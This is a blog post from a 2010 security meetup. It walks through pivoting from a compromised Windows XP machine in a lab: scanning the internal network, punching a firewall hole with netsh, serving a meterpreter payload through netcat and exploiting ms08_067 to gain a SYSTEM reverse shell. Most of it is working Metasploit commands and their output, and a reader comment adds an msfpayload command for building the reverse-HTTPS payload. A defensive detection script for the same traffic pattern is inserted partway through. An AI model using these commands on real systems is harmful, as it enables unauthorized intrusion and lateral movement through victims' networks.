
Sunday, November 28, 2010

[n|u Delhi Presentations] Post exploitation techniques...

There was a presentation on "Post exploitation techniques using msf-nc kungfu" at the null monthly meet.
So here is a post about the presentation and the things I may have missed.

Aim:
There is a compromised machine in a network and you want to find/target other nodes inside the network.

Scenario:
The attacker, running BackTrack, sits outside the network. Machine A (the pivot) and machine B are behind NAT.



So here we go with the meterpreter session on pivot machine:

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0



AMD PCNET Family PCI Ethernet Adapter #3 - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:1e:d3:76
IP Address : 192.168.74.128
Netmask : 255.255.255.0


meterpreter > route

Network routes
==============

Subnet Netmask Gateway
------ ------- -------
0.0.0.0 0.0.0.0 192.168.74.2
127.0.0.0 255.0.0.0 127.0.0.1
192.168.74.0 255.255.255.0 192.168.74.128
192.168.74.128 255.255.255.255 127.0.0.1
192.168.74.255 255.255.255.255 192.168.74.128
224.0.0.0 240.0.0.0 192.168.74.128
255.255.255.255 255.255.255.255 192.168.74.128

meterpreter >

1. Pass the traffic for the desired subnet through the meterpreter session:
In order to run scans and other modules against the internal network, we need to add a route so that traffic for the target subnet is routed through the meterpreter session.
Let's see how we can do that...

Back on the multi/handler...

msf exploit(handler) > route add 192.168.74.0 255.255.255.0 1
msf exploit(handler) > route print

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
192.168.74.0 255.255.255.0 Session 1

msf exploit(handler) >

Now all traffic for subnet 192.168.74.0/24 will be routed through meterpreter session 1.

2. Enumerate the nodes inside the network:
We will use the meterpreter script arp_scanner to scan the network.

msf exploit(handler) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 WINXP\user @ WINXP 172.16.24.130:443 -> 172.16.24.1:46715

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run arp_scanner -h
Meterpreter Script for performing an ARPS Scan Discovery.

OPTIONS:

-h Help menu.
-i Enumerate Local Interfaces
-r The target address range or CIDR identifier
-s Save found IP Addresses to logs.


meterpreter > run arp_scanner -r 192.168.74.0/24
[*] ARP Scanning 192.168.74.0/24
[*] IP: 192.168.74.1 MAC 0:50:56:c0:0:8
[*] IP: 192.168.74.2 MAC 0:50:56:ec:f0:e5
[*] IP: 192.168.74.128 MAC 0:c:29:1e:d3:76
[*] IP: 192.168.74.129 MAC 0:c:29:7e:bd:74
[*] IP: 192.168.74.254 MAC 0:50:56:e5:a:b0
meterpreter >


Ok. As you can see, 5 IP addresses appear to be alive in the network.
The addresses 192.168.74.1, 192.168.74.2 and 192.168.74.254 belong to VMware Workstation's virtual network adapters.
They are distributed as follows:
192.168.74.2 - gateway IP address for the virtual machines behind NAT
192.168.74.1 - external IP address (vmnet8)
192.168.74.254 - DHCP server for the virtual machines behind NAT

Apart from those and the pivot itself (192.168.74.128), there is one more virtual machine, 192.168.74.129, which is of interest to us.
Let's find out...



We will use the tcp portscan auxiliary module to find open ports, limited to some well-known ports.

msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
FILTER no The filter string for capturing traffic
INTERFACE no The name of the interface
PCAPFILE no The name of the PCAP capture file to process
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target address range or CIDR identifier
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads
TIMEOUT 1000 yes The socket connect timeout in milliseconds
VERBOSE false no Display verbose output

msf auxiliary(tcp) > set RHOSTS 192.168.74.129
RHOSTS => 192.168.74.129
msf auxiliary(tcp) > set PORTS 21,22,23,25,80,110,135,139,443,445
PORTS => 21,22,23,25,80,110,135,139,443,445
msf auxiliary(tcp) > run

[*] 192.168.74.129:139 - TCP OPEN
[*] 192.168.74.129:445 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) >

Alright. Ports 139 and 445 are open, so file sharing seems to be enabled on the target machine.
We will use the infamous ms08_067 exploit...

But now there is a problem choosing an appropriate payload:
- A bind shell payload can't be used, as we have no direct access to machine B. Even if machine B gets exploited and starts listening on the port specified by the payload, we won't be able to connect to it.
- Reverse connect payloads can't be used either, assuming that machine B has no direct internet access.

So what I did was upload netcat and a custom file consisting of an HTTP response with a meterpreter client executable appended. If the exploit succeeds, the executable served from the pivot reverse-connects back to the multi/handler listening on the attacker's machine, which also confirms that the exploit worked.

Let's do that...

meterpreter > upload /tmp/netcat.exe /tmp/httpresponse-msf.cfg %temp%
[*] uploading : /tmp/netcat.exe -> %temp%
[*] uploaded : /tmp/netcat.exe -> %temp%\netcat.exe
[*] uploading : /tmp/httpresponse-msf.cfg -> %temp%
[*] uploaded : /tmp/httpresponse-msf.cfg -> %temp%\httpresponse-msf.cfg
meterpreter >

Ok.
Now we will start a small web server using netcat on the pivot machine, redirecting httpresponse-msf.cfg (the file can have any extension) as its input.

meterpreter > execute -H -f cmd.exe -c -i
Process 256 created.
Channel 9 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user\Desktop>cd %temp%
cd %temp%

C:\DOCUME~1\user\LOCALS~1\Temp>dir
dir
Volume in drive C has no label.
Volume Serial Number is 080D-40BD

Directory of C:\DOCUME~1\user\LOCALS~1\Temp

12/05/2010 01:57 AM <DIR> .
12/05/2010 01:57 AM <DIR> ..
10/23/2009 07:30 PM 8,704 21227.mst
10/23/2009 07:30 PM 8,704 21ad2.mst
10/23/2009 07:30 PM 8,704 48f1e.mst
10/23/2009 07:30 PM 8,704 c833.mst
08/15/2009 02:54 AM 8,704 ff21.mst
12/05/2010 01:57 AM 74,144 httpresponse-msf.cfg
12/05/2010 01:57 AM 61,440 netcat.exe
10/23/2009 07:30 PM 33,709 vminst.log_20091023_193054.log
06/10/2010 11:06 AM 41,986 vminst.log_20100610_110602.log
09/24/2010 12:47 PM 45,686 vminst.log_20100924_124718.log
09/28/2010 04:41 PM 45,537 vminst.log_20100928_164134.log
11/29/2010 03:53 PM 45,537 vminst.log_20101129_155316.log
10/23/2009 07:30 PM 2,573,050 vmmsi.log_20091023_193054.log
10/23/2009 07:30 PM 2,573,050 vmmsi.log_20091023_193054_Failed.log
06/10/2010 11:06 AM 2,958,144 vmmsi.log_20100610_110601.log
09/24/2010 12:47 PM 3,008,988 vmmsi.log_20100924_124718.log
09/28/2010 04:41 PM 2,960,554 vmmsi.log_20100928_164134.log
11/29/2010 03:53 PM 2,958,778 vmmsi.log_20101129_155316.log
11/29/2010 03:54 PM <DIR> VMwareDnD
18 File(s) 17,424,123 bytes
3 Dir(s) 40,819,601,408 bytes free

C:\DOCUME~1\user\LOCALS~1\Temp>start /b netcat.exe -nlvp 80 < httpresponse-msf.cfg
listening on [any] 80 ...


C:\DOCUME~1\user\LOCALS~1\Temp>




Oops. Looks like somebody is interfering with our business.
The firewall on the pivot machine may block opening a port in listening mode.
But we have access to this machine, so here is how we can add an exception to the firewall...

C:\DOCUME~1\user\LOCALS~1\Temp>netsh firewall set portopening tcp 80 nc enable all
netsh firewall set portopening tcp 80 nc enable all
Ok.


C:\DOCUME~1\user\LOCALS~1\Temp>


Ok. Port 80 is now open in the firewall and enabled for listening.
Alright, let's run netcat once again, as we did before.

C:\DOCUME~1\user\LOCALS~1\Temp>start /b netcat.exe -nlvp 80 < httpresponse-msf.cfg
listening on [any] 80 ...


C:\DOCUME~1\user\LOCALS~1\Temp>exit
exit
^C
Terminate channel 9? [y/N] y
meterpreter >

All set. Now set the parameters and run ms08_067 for machine B...

meterpreter > background
msf exploit(handler) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)


Exploit target:

Id Name
-- ----
0 Automatic Targeting


msf exploit(ms08_067_netapi) > set RHOST 192.168.74.129
RHOST => 192.168.74.129
msf exploit(ms08_067_netapi) > set PAYLOAD windows/download_exec
PAYLOAD => windows/download_exec
msf exploit(ms08_067_netapi) > set URL http://192.168.74.128/
URL => http://192.168.74.128/
msf exploit(ms08_067_netapi) > show options
Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.74.129 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/download_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
URL http://192.168.74.128/ yes The pre-encoded URL to the executable


Exploit target:

Id Name
-- ----
0 Automatic Targeting


msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
msf exploit(ms08_067_netapi) >
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] 172.16.24.1:36593 Request received for /Af4IZ...
[*] 172.16.24.1:36593 Staging connection for target f4IZ received...
[*] Patching Target ID f4IZ into DLL
[*] 172.16.24.1:45245 Request received for /Bf4IZ...
[*] 172.16.24.1:45245 Stage connection for target f4IZ received...
[*] Meterpreter session 2 opened (172.16.24.130:443 -> 172.16.24.1:45245) at 2010-12-04 20:57:45 +0000

msf exploit(ms08_067_netapi) >

Here we go...
As we can see, the exploit succeeded and opened meterpreter session 2, which connected back to the attacker's machine.
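From the defender's side, the chain above leaves a distinctive trace in connection logs: the pivot (192.168.74.128) connects to the victim's SMB port, and seconds later the victim fetches an executable over HTTP from that same workstation. The following detector is an added example, not code from the original post; the log format and sample lines are constructed, and the five-minute correlation window is an assumption.

```python
from datetime import datetime, timedelta

# Constructed sample connection log (not from the original post). One line per
# connection: "timestamp src dst dport note", where note is "-" or
# "http:<content-type>" for an HTTP response observed on that connection.
SAMPLE_LOG = """\
2010-12-04T20:55:01 192.168.74.128 192.168.74.129 445 -
2010-12-04T20:57:40 192.168.74.128 192.168.74.129 445 -
2010-12-04T20:57:42 192.168.74.129 192.168.74.128 80 http:application/x-msdos-program
2010-12-04T21:10:00 192.168.74.50 192.168.74.20 445 -
2010-12-04T21:12:00 192.168.74.20 192.168.74.50 80 http:text/html
2010-12-04T22:00:00 192.168.74.20 192.168.74.129 80 http:application/x-msdos-program
"""

# Content types under which a Windows executable is typically served.
EXEC_TYPES = {"application/x-msdos-program", "application/x-msdownload",
              "application/octet-stream"}


def parse_log(text):
    """Parse the constructed format into (ts, src, dst, dport, note) tuples."""
    events = []
    for line in text.splitlines():
        ts, src, dst, dport, note = line.split()
        events.append((datetime.fromisoformat(ts), src, dst, int(dport), note))
    return events


def find_pivot_chains(text, known_web_servers=frozenset(), window=timedelta(minutes=5)):
    """Flag host B downloading an executable over HTTP from host A shortly after
    A connected to B's SMB port, where A is not a known web server. This is the
    pivot -> victim -> pivot pattern of an SMB exploit whose download_exec payload
    fetches its stage from a listener on the pivot."""
    events = parse_log(text)
    smb = [(ts, src, dst) for ts, src, dst, dport, _ in events if dport == 445]
    findings = []
    for ts, src, dst, _dport, note in events:
        ctype = note[5:] if note.startswith("http:") else None
        if ctype not in EXEC_TYPES or dst in known_web_servers:
            continue
        # SMB connections from the improvised "web server" to the downloader
        # inside the window; keep the latest one as the likely exploit attempt.
        prior = [sts for sts, ssrc, sdst in smb
                 if ssrc == dst and sdst == src and timedelta(0) <= ts - sts <= window]
        if prior:
            findings.append({"pivot": dst, "victim": src,
                             "smb_at": max(prior).isoformat(),
                             "download_at": ts.isoformat(), "content_type": ctype})
    return findings


if __name__ == "__main__":
    for finding in find_pivot_chains(SAMPLE_LOG):
        print(finding)
```

The HTML download at 21:12 and the executable served by 192.168.74.129 at 22:00 are not flagged, because neither is preceded by an SMB connection from the serving host to the downloading host.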

msf exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 WINXP\user @ WINXP 172.16.24.130:443 -> 172.16.24.1:46715
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ WINXP 172.16.24.130:443 -> 172.16.24.1:45245

msf exploit(ms08_067_netapi) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0



AMD PCNET Family PCI Ethernet Adapter #3 - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:7e:bd:74
IP Address : 192.168.74.129
Netmask : 255.255.255.0


meterpreter >



..............Done!!!

4 comments:

  1. Can you share the httpresponse-msf.cfg file?

  2. httpresponse-msf.cfg file?

  3. Sorry for so late replies:

    @rajsumeru Thank you

    @anonymous you can create the file as follows:

    -Create a text file with http-response

    HTTP/1.1 200 OK
    Date: Sat, 27 Nov 2010 07:37:41 GMT
    Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.5 with Suhosin-Patch
    Last-Modified: Sat, 27 Nov 2010 07:31:34 GMT
    ETag: "d3ffd-1204a-49603d4142180"
    Accept-Ranges: bytes
    Content-Length: 73802
    Keep-Alive: timeout=15, max=100
    Connection: Keep-Alive
    Content-Type: application/x-msdos-program


    And append msf.exe (created by
    $ msfpayload windows/meterpreter/reverse_https LHOST=172.16.24.130 LPORT=443 X > msf.exe
    )

    In case you are still in doubt, you can send me mail at sagar dot belure at gmail dot com, and I will send you the file.
